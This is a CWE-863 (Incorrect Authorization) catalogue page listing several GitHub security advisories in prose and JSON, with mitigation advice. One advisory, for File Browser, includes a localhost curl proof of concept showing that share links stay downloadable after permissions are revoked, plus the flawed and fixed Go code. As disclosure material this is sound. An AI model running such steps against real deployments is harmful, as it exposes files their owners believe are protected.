Common Weakness Enumeration

CWE-863

Allowed-with-Review

Incorrect Authorization

Abstraction: Class · Status: Incomplete

The product performs an authorization check when an actor attempts to access a resource or perform an action, but it does not correctly perform the check.

5548 vulnerabilities reference this CWE, most recent first.

GHSA-V987-5JRJ-J3XX

Vulnerability from github – Published: 2022-07-16 00:00 – Updated: 2022-07-22 00:00
VLAI
Details

An issue was discovered in Inductive Automation Ignition before 7.9.20 and 8.x before 8.1.17. Designer and Vision Client Session IDs are mishandled. An attacker can determine which session IDs were generated in the past and then hijack sessions assigned to these IDs via Randy.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2022-35890"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-863"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2022-07-15T21:15:00Z",
    "severity": "CRITICAL"
  },
  "details": "An issue was discovered in Inductive Automation Ignition before 7.9.20 and 8.x before 8.1.17. Designer and Vision Client Session IDs are mishandled. An attacker can determine which session IDs were generated in the past and then hijack sessions assigned to these IDs via Randy.",
  "id": "GHSA-v987-5jrj-j3xx",
  "modified": "2022-07-22T00:00:38Z",
  "published": "2022-07-16T00:00:20Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-35890"
    },
    {
      "type": "WEB",
      "url": "https://github.com/sourceincite/randy"
    },
    {
      "type": "WEB",
      "url": "https://support.inductiveautomation.com/hc/en-us/articles/7625759776653"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-V9H9-P74G-4CCW

Vulnerability from github – Published: 2022-05-05 00:00 – Updated: 2022-05-14 00:03
VLAI
Details

An improper access control vulnerability [CWE-284] in FortiIsolator versions 2.3.2 and below may allow an authenticated, non privileged attacker to regenerate the CA certificate via the regeneration URL.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2021-41020"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-863"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2022-05-04T16:15:00Z",
    "severity": "HIGH"
  },
  "details": "An improper access control vulnerability [CWE-284] in FortiIsolator versions 2.3.2 and below may allow an authenticated, non privileged attacker to regenerate the CA certificate via the regeneration URL.",
  "id": "GHSA-v9h9-p74g-4ccw",
  "modified": "2022-05-14T00:03:36Z",
  "published": "2022-05-05T00:00:19Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-41020"
    },
    {
      "type": "WEB",
      "url": "https://fortiguard.com/psirt/FG-IR-21-040"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-V9JR-G692-6QHV

Vulnerability from github – Published: 2022-07-27 00:00 – Updated: 2022-07-30 00:00
VLAI
Details

Inappropriate implementation in WebGL in Google Chrome prior to 101.0.4951.41 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2022-1482"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-863"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2022-07-26T22:15:00Z",
    "severity": "MODERATE"
  },
  "details": "Inappropriate implementation in WebGL in Google Chrome prior to 101.0.4951.41 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.",
  "id": "GHSA-v9jr-g692-6qhv",
  "modified": "2022-07-30T00:00:19Z",
  "published": "2022-07-27T00:00:33Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-1482"
    },
    {
      "type": "WEB",
      "url": "https://chromereleases.googleblog.com/2022/04/stable-channel-update-for-desktop_26.html"
    },
    {
      "type": "WEB",
      "url": "https://crbug.com/1304987"
    },
    {
      "type": "WEB",
      "url": "https://security.gentoo.org/glsa/202208-25"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-V9M4-696P-QH68

Vulnerability from github – Published: 2023-12-12 03:31 – Updated: 2023-12-12 03:31
VLAI
Details

Due to lack of proper authorization checks in Emarsys SDK for Android, an attacker can call a particular activity and can forward himself web pages and/or deep links without any validation directly from the host application. On successful attack, an attacker could navigate to arbitrary URL including application deep links on the device.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2023-6542"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-863"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2023-12-12T02:15:09Z",
    "severity": "HIGH"
  },
  "details": "Due to lack of proper authorization checks in Emarsys SDK for Android, an attacker can call a particular activity and can forward himself web pages and/or deep links without any validation directly from the host application. On successful attack, an attacker could navigate to arbitrary URL including application deep links on the device.\n\n",
  "id": "GHSA-v9m4-696p-qh68",
  "modified": "2023-12-12T03:31:45Z",
  "published": "2023-12-12T03:31:45Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-6542"
    },
    {
      "type": "WEB",
      "url": "https://me.sap.com/notes/3406244"
    },
    {
      "type": "WEB",
      "url": "https://www.sap.com/documents/2022/02/fa865ea4-167e-0010-bca6-c68f7e60039b.html"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-V9RC-F4WG-2JRV

Vulnerability from github – Published: 2022-05-24 19:14 – Updated: 2022-07-13 00:01
VLAI
Details

Under certain conditions, SAP Business One version - 10.0, allows an unauthorized attacker to get access to some encrypted sensitive information, but does not have control over kind or degree.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2021-33686"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-863"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2021-09-14T12:15:00Z",
    "severity": "MODERATE"
  },
  "details": "Under certain conditions, SAP Business One version - 10.0, allows an unauthorized attacker to get access to some encrypted sensitive information, but does not have control over kind or degree.",
  "id": "GHSA-v9rc-f4wg-2jrv",
  "modified": "2022-07-13T00:01:26Z",
  "published": "2022-05-24T19:14:28Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-33686"
    },
    {
      "type": "WEB",
      "url": "https://launchpad.support.sap.com/#/notes/3070138"
    },
    {
      "type": "WEB",
      "url": "https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=585106405"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-V9VJ-VPG8-VQMJ

Vulnerability from github – Published: 2022-05-24 17:47 – Updated: 2022-08-06 00:00
VLAI
Details

In Fibaro Home Center 2 and Lite devices with firmware version 4.600 and older an internal management service is accessible on port 8000 and some API endpoints could be accessed without authentication to trigger a shutdown, a reboot or a reboot into recovery mode.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2021-20990"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-306",
      "CWE-863"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2021-04-19T14:15:00Z",
    "severity": "HIGH"
  },
  "details": "In Fibaro Home Center 2 and Lite devices with firmware version 4.600 and older an internal management service is accessible on port 8000 and some API endpoints could be accessed without authentication to trigger a shutdown, a reboot or a reboot into recovery mode.",
  "id": "GHSA-v9vj-vpg8-vqmj",
  "modified": "2022-08-06T00:00:41Z",
  "published": "2022-05-24T17:47:46Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-20990"
    },
    {
      "type": "WEB",
      "url": "https://www.iot-inspector.com/blog/advisory-fibaro-home-center"
    },
    {
      "type": "WEB",
      "url": "http://packetstormsecurity.com/files/162243/Fibaro-Home-Center-MITM-Missing-Authentication-Code-Execution.html"
    },
    {
      "type": "WEB",
      "url": "http://seclists.org/fulldisclosure/2021/Apr/27"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-V9W3-34XQ-HRJG

Vulnerability from github – Published: 2023-12-13 18:31 – Updated: 2023-12-18 21:43
VLAI
Summary
Tokens stored in plain text by PaaSLane Estimate Plugin
Details

Jenkins PaaSLane Estimate Plugin 1.0.4 and earlier does not mask PaaSLane authentication tokens displayed on the job configuration form, increasing the potential for attackers to observe and capture them.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "Maven",
        "name": "com.cloudtp.jenkins:paaslane-estimate"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "last_affected": "1.0.4"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2023-50777"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-312",
      "CWE-863"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2023-12-13T23:15:24Z",
    "nvd_published_at": "2023-12-13T18:15:44Z",
    "severity": "MODERATE"
  },
  "details": "Jenkins PaaSLane Estimate Plugin 1.0.4 and earlier does not mask PaaSLane authentication tokens displayed on the job configuration form, increasing the potential for attackers to observe and capture them.",
  "id": "GHSA-v9w3-34xq-hrjg",
  "modified": "2023-12-18T21:43:29Z",
  "published": "2023-12-13T18:31:04Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-50777"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/jenkinsci/paaslane-plugin"
    },
    {
      "type": "WEB",
      "url": "https://www.jenkins.io/security/advisory/2023-12-13/#SECURITY-3182"
    },
    {
      "type": "WEB",
      "url": "http://www.openwall.com/lists/oss-security/2023/12/13/4"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Tokens stored in plain text by PaaSLane Estimate Plugin "
}

GHSA-V9W4-GM2X-6RVF

Vulnerability from github – Published: 2026-04-08 00:04 – Updated: 2026-04-08 00:04
VLAI
Summary
File Browser share links remain accessible after Share/Download permissions are revoked
Details

When an admin revokes a user's Share and Download permissions, existing share links created by that user remain fully accessible to unauthenticated users. The public share download handler does not re-check the share owner's current permissions. Verified with a running PoC against v2.62.2 (commit 860c19d).

Details

Share creation (http/share.go:21-29) correctly checks permissions:

func withPermShare(fn handleFunc) handleFunc {
    return withUser(func(w http.ResponseWriter, r *http.Request, d *data) (int, error) {
        if !d.user.Perm.Share || !d.user.Perm.Download {
            return http.StatusForbidden, nil
        }
        return fn(w, r, d)
    })
}

But share access (http/public.go:18-87, withHashFile) does not:

var withHashFile = func(fn handleFunc) handleFunc {
    return func(w http.ResponseWriter, r *http.Request, d *data) (int, error) {
        link, err := d.store.Share.GetByHash(id)   // line 21: checks share exists
        authenticateShareRequest(r, link)            // line 26: checks password
        user, err := d.store.Users.Get(...)          // line 31: checks user exists
        d.user = user                                // line 36: sets user
        file, err := files.NewFileInfo(...)           // line 38: gets file
        // MISSING: no check for d.user.Perm.Share or d.user.Perm.Download
    }
}

Proof of Concept (runtime-verified)

# Step 1: Login as admin
TOKEN=$(curl -s -X POST http://localhost:18080/api/login \
  -H "Content-Type: application/json" \
  -d '{"username":"admin","password":"<admin-password>"}')

# Step 2: Create testuser with Share+Download permissions
curl -X POST http://localhost:18080/api/users \
  -H "X-Auth: $TOKEN" -H "Content-Type: application/json" \
  -d '{"what":"user","which":[],"current_password":"<admin-password>",
       "data":{"username":"testuser","password":"TestPass123!","scope":".",
       "perm":{"share":true,"download":true,"create":true}}}'

# Step 3: Login as testuser and create share
USER_TOKEN=$(curl -s -X POST http://localhost:18080/api/login \
  -H "Content-Type: application/json" \
  -d '{"username":"testuser","password":"TestPass123!"}')
curl -X POST http://localhost:18080/api/share/secret.txt \
  -H "X-Auth: $USER_TOKEN" -H "Content-Type: application/json" -d '{}'
# Returns: {"hash":"fB4Qwtsn","path":"/secret.txt","userID":2,"expire":0}

# Step 4: Verify share works (unauthenticated)
curl http://localhost:18080/api/public/dl/fB4Qwtsn
# Returns: file content (200 OK)

# Step 5: Admin revokes testuser's Share and Download permissions
curl -X PUT http://localhost:18080/api/users/2 \
  -H "X-Auth: $TOKEN" -H "Content-Type: application/json" \
  -d '{"what":"user","which":["all"],"current_password":"<admin-password>",
       "data":{"id":2,"username":"testuser","scope":".",
       "perm":{"share":false,"download":false,"create":true}}}'

# Step 6: Verify testuser CANNOT create new shares
curl -X POST http://localhost:18080/api/share/secret.txt \
  -H "X-Auth: $USER_TOKEN" -d '{}'
# Returns: 403 Forbidden (correct)

# Step 7: THE BUG - old share STILL works
curl http://localhost:18080/api/public/dl/fB4Qwtsn
# Returns: file content (200 OK) - SHOULD be 403

Impact

When an admin revokes a user's Share or Download permissions: - New share creation is correctly blocked (403) - But all existing shares created by that user remain fully accessible to unauthenticated users - The admin has a false sense of security: they believe revoking Share permission stops all sharing

This is the same vulnerability class as GHSA-68j5-4m99-w9w9 ("Authorization Policy Bypass in Public Share Download Flow").

Suggested Fix

Add permission re-validation in withHashFile:

user, err := d.store.Users.Get(d.server.Root, link.UserID)
if err != nil {
    return errToStatus(err), err
}

// Verify the share owner still has Share and Download permissions
if !user.Perm.Share || !user.Perm.Download {
    return http.StatusForbidden, nil
}

d.user = user

Update: Fix submitted as PR #5888.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "Go",
        "name": "github.com/filebrowser/filebrowser/v2"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "2.63.1"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-35604"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-863"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-04-08T00:04:59Z",
    "nvd_published_at": "2026-04-07T17:16:34Z",
    "severity": "HIGH"
  },
  "details": "When an admin revokes a user\u0027s Share and Download permissions, existing share links created by that user remain fully accessible to unauthenticated users. The public share download handler does not re-check the share owner\u0027s current permissions. Verified with a running PoC against v2.62.2 (commit 860c19d).\n\n## Details\n\nShare creation (`http/share.go:21-29`) correctly checks permissions:\n\n    func withPermShare(fn handleFunc) handleFunc {\n        return withUser(func(w http.ResponseWriter, r *http.Request, d *data) (int, error) {\n            if !d.user.Perm.Share || !d.user.Perm.Download {\n                return http.StatusForbidden, nil\n            }\n            return fn(w, r, d)\n        })\n    }\n\nBut share access (`http/public.go:18-87`, `withHashFile`) does not:\n\n    var withHashFile = func(fn handleFunc) handleFunc {\n        return func(w http.ResponseWriter, r *http.Request, d *data) (int, error) {\n            link, err := d.store.Share.GetByHash(id)   // line 21: checks share exists\n            authenticateShareRequest(r, link)            // line 26: checks password\n            user, err := d.store.Users.Get(...)          // line 31: checks user exists\n            d.user = user                                // line 36: sets user\n            file, err := files.NewFileInfo(...)           // line 38: gets file\n            // MISSING: no check for d.user.Perm.Share or d.user.Perm.Download\n        }\n    }\n\n## Proof of Concept (runtime-verified)\n\n    # Step 1: Login as admin\n    TOKEN=$(curl -s -X POST http://localhost:18080/api/login \\\n      -H \"Content-Type: application/json\" \\\n      -d \u0027{\"username\":\"admin\",\"password\":\"\u003cadmin-password\u003e\"}\u0027)\n\n    # Step 2: Create testuser with Share+Download permissions\n    curl -X POST http://localhost:18080/api/users \\\n      -H \"X-Auth: $TOKEN\" -H \"Content-Type: application/json\" \\\n      -d \u0027{\"what\":\"user\",\"which\":[],\"current_password\":\"\u003cadmin-password\u003e\",\n           \"data\":{\"username\":\"testuser\",\"password\":\"TestPass123!\",\"scope\":\".\",\n           \"perm\":{\"share\":true,\"download\":true,\"create\":true}}}\u0027\n\n    # Step 3: Login as testuser and create share\n    USER_TOKEN=$(curl -s -X POST http://localhost:18080/api/login \\\n      -H \"Content-Type: application/json\" \\\n      -d \u0027{\"username\":\"testuser\",\"password\":\"TestPass123!\"}\u0027)\n    curl -X POST http://localhost:18080/api/share/secret.txt \\\n      -H \"X-Auth: $USER_TOKEN\" -H \"Content-Type: application/json\" -d \u0027{}\u0027\n    # Returns: {\"hash\":\"fB4Qwtsn\",\"path\":\"/secret.txt\",\"userID\":2,\"expire\":0}\n\n    # Step 4: Verify share works (unauthenticated)\n    curl http://localhost:18080/api/public/dl/fB4Qwtsn\n    # Returns: file content (200 OK)\n\n    # Step 5: Admin revokes testuser\u0027s Share and Download permissions\n    curl -X PUT http://localhost:18080/api/users/2 \\\n      -H \"X-Auth: $TOKEN\" -H \"Content-Type: application/json\" \\\n      -d \u0027{\"what\":\"user\",\"which\":[\"all\"],\"current_password\":\"\u003cadmin-password\u003e\",\n           \"data\":{\"id\":2,\"username\":\"testuser\",\"scope\":\".\",\n           \"perm\":{\"share\":false,\"download\":false,\"create\":true}}}\u0027\n\n    # Step 6: Verify testuser CANNOT create new shares\n    curl -X POST http://localhost:18080/api/share/secret.txt \\\n      -H \"X-Auth: $USER_TOKEN\" -d \u0027{}\u0027\n    # Returns: 403 Forbidden (correct)\n\n    # Step 7: THE BUG - old share STILL works\n    curl http://localhost:18080/api/public/dl/fB4Qwtsn\n    # Returns: file content (200 OK) - SHOULD be 403\n\n## Impact\n\nWhen an admin revokes a user\u0027s Share or Download permissions:\n- New share creation is correctly blocked (403)\n- But all existing shares created by that user remain fully accessible to unauthenticated users\n- The admin has a false sense of security: they believe revoking Share permission stops all sharing\n\nThis is the same vulnerability class as GHSA-68j5-4m99-w9w9 (\"Authorization Policy Bypass in Public Share Download Flow\").\n\n## Suggested Fix\n\nAdd permission re-validation in `withHashFile`:\n\n    user, err := d.store.Users.Get(d.server.Root, link.UserID)\n    if err != nil {\n        return errToStatus(err), err\n    }\n\n    // Verify the share owner still has Share and Download permissions\n    if !user.Perm.Share || !user.Perm.Download {\n        return http.StatusForbidden, nil\n    }\n\n    d.user = user\n\n---\n\n**Update:** Fix submitted as PR #5888.",
  "id": "GHSA-v9w4-gm2x-6rvf",
  "modified": "2026-04-08T00:04:59Z",
  "published": "2026-04-08T00:04:59Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/filebrowser/filebrowser/security/advisories/GHSA-v9w4-gm2x-6rvf"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35604"
    },
    {
      "type": "WEB",
      "url": "https://github.com/filebrowser/filebrowser/pull/5888"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/filebrowser/filebrowser"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N",
      "type": "CVSS_V4"
    }
  ],
  "summary": "File Browser share links remain accessible after Share/Download permissions are revoked"
}

GHSA-VC32-H5MQ-453V

Vulnerability from github – Published: 2026-04-09 17:34 – Updated: 2026-05-06 02:41
VLAI
Summary
OpenClaw: /allowlist omits owner-only enforcement for cross-channel allowlist writes
Details

Impact

/allowlist omits owner-only enforcement for cross-channel allowlist writes.

An authorized non-owner sender could attempt allowlist writes against a different channel.

OpenClaw is a user-controlled local assistant. This advisory is scoped to the OpenClaw trust model and does not assume a multi-tenant service boundary.

Affected Packages / Versions

  • Package: openclaw (npm)
  • Affected versions: <=v2026.4.1
  • Patched versions: 2026.4.8

Fix

The issue was fixed on main and is available in the patched npm version listed above. The verified fixed tree is commit d7c3210cd6f5fdfdc1beff4c9541673e814354d5.

Verification

The fix was re-checked against main before publication, including targeted regression tests for the affected security boundary.

Credits

Thanks @zsxsoft and @KeenSecurityLab for reporting.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "openclaw"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "2026.4.8"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-41910"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-863"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-04-09T17:34:33Z",
    "nvd_published_at": "2026-04-28T19:37:44Z",
    "severity": "MODERATE"
  },
  "details": "## Impact\n\n/allowlist omits owner-only enforcement for cross-channel allowlist writes.\n\nAn authorized non-owner sender could attempt allowlist writes against a different channel.\n\nOpenClaw is a user-controlled local assistant. This advisory is scoped to the OpenClaw trust model and does not assume a multi-tenant service boundary.\n\n## Affected Packages / Versions\n\n- Package: `openclaw` (npm)\n- Affected versions: `\u003c=v2026.4.1`\n- Patched versions: `2026.4.8`\n\n## Fix\n\nThe issue was fixed on `main` and is available in the patched npm version listed above. The verified fixed tree is commit `d7c3210cd6f5fdfdc1beff4c9541673e814354d5`.\n\n## Verification\n\nThe fix was re-checked against `main` before publication, including targeted regression tests for the affected security boundary.\n\n## Credits\n\nThanks @zsxsoft and @KeenSecurityLab for reporting.",
  "id": "GHSA-vc32-h5mq-453v",
  "modified": "2026-05-06T02:41:10Z",
  "published": "2026-04-09T17:34:33Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-vc32-h5mq-453v"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41910"
    },
    {
      "type": "WEB",
      "url": "https://github.com/openclaw/openclaw/commit/d7c3210cd6f5fdfdc1beff4c9541673e814354d5"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/openclaw/openclaw"
    },
    {
      "type": "WEB",
      "url": "https://www.vulncheck.com/advisories/openclaw-missing-owner-only-enforcement-in-allowlist-cross-channel-writes"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N",
      "type": "CVSS_V3"
    },
    {
      "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N",
      "type": "CVSS_V4"
    }
  ],
  "summary": "OpenClaw: /allowlist omits owner-only enforcement for cross-channel allowlist writes"
}

GHSA-VC3V-RGF8-2C4V

Vulnerability from github – Published: 2021-12-24 00:00 – Updated: 2021-12-29 00:01
VLAI
Details

Insufficient policy enforcement in background fetch in Google Chrome prior to 96.0.4664.45 allowed a remote attacker to bypass same origin policy via a crafted HTML page.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2021-38016"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-863"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2021-12-23T01:15:00Z",
    "severity": "HIGH"
  },
  "details": "Insufficient policy enforcement in background fetch in Google Chrome prior to 96.0.4664.45 allowed a remote attacker to bypass same origin policy via a crafted HTML page.",
  "id": "GHSA-vc3v-rgf8-2c4v",
  "modified": "2021-12-29T00:01:09Z",
  "published": "2021-12-24T00:00:55Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-38016"
    },
    {
      "type": "WEB",
      "url": "https://chromereleases.googleblog.com/2021/11/stable-channel-update-for-desktop.html"
    },
    {
      "type": "WEB",
      "url": "https://crbug.com/1244289"
    },
    {
      "type": "WEB",
      "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/3W46HRT2UVHWSLZB6JZHQF6JNQWKV744"
    },
    {
      "type": "WEB",
      "url": "https://www.debian.org/security/2022/dsa-5046"
    }
  ],
  "schema_version": "1.4.0",
  "severity": []
}

Mitigation
Architecture and Design
  • Divide the product into anonymous, normal, privileged, and administrative areas. Reduce the attack surface by carefully mapping roles with data and functionality. Use role-based access control (RBAC) [REF-229] to enforce the roles at the appropriate boundaries.
  • Note that this approach may not protect against horizontal authorization, i.e., it will not protect a user from attacking others with the same role.
Mitigation
Architecture and Design

Ensure that access control checks are performed related to the business logic. These checks may be different than the access control checks that are applied to more generic resources such as files, connections, processes, memory, and database records. For example, a database may restrict access for medical records to a specific database user, but each record might only be intended to be accessible to the patient and the patient's doctor [REF-7].

Mitigation MIT-4.4
Architecture and Design

Strategy: Libraries or Frameworks

  • Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid.
  • For example, consider using authorization frameworks such as the JAAS Authorization Framework [REF-233] and the OWASP ESAPI Access Control feature [REF-45].
Mitigation
Architecture and Design
  • For web applications, make sure that the access control mechanism is enforced correctly at the server side on every page. Users should not be able to access any unauthorized functionality or information by simply requesting direct access to that page.
  • One way to do this is to ensure that all pages containing sensitive information are not cached, and that all such pages restrict access to requests that are accompanied by an active and authenticated session token associated with a user who has the required permissions to access that page.
Mitigation
System Configuration Installation

Use the access control capabilities of your operating system and server environment and define your access control lists accordingly. Use a "default deny" policy when defining these ACLs.

No CAPEC attack patterns related to this CWE.